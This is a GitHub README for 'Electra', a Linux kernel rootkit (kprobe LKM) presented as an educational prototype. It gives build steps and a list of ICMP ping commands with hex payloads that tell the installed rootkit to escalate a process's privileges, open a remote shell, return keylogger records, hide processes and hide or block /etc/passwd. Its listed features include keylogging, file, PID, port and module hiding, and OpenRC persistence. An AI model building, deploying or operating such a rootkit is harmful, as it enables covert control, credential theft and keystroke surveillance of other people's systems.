Skip to content

MikeHorn-git/Electra

BranchesTags

Repository files navigation

Electra

pleiades

Important

This rootkit is for educational and research purposes only. This project is a prototype, and not fully functionnal.

Table of content

Installation

git clone https://github.com/MikeHorn-git/Electra.git
cd Electra/
make

Usage

Important

Do not using ping from Busybox

ping -p <code> -c 1 8.8.8.8

Elevate process privilege

ping -p ca550100000000000000000000000000 -c 1 8.8.8.8

Launch a remote shell

ping -p ff -c 1 8.8.8.8

Get a keylogger records

ping -p ba -c 1 8.8.8.8

Hide process

ping -p de550100000000000000000000000000 -c 1 8.8.8.8

Hide passwd file

ping -p ad017061737377640000000000000000 -c 1 8.8.8.8

Restore

ping -p ad007061737377640000000000000000 -c 1 8.8.8.8

Unable to open /etc/passwd

ping -p fe012f6574632f706173737764000000 -c 1 18.8.8.8

Restore

ping -p fe002f6574632f706173737764000000 -c 1 18.8.8.8

Features

  • ICMP communication
  • Keylogger
  • File hide
  • PID hide
  • Port hide
  • LKM hide
  • Openrc Persistence

Authors

About

Kprobe LKM rootkit

Topics

linux kernel rootkit lkm kprobe

Resources

Readme

License

GPL-3.0 license
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Contributors

Languages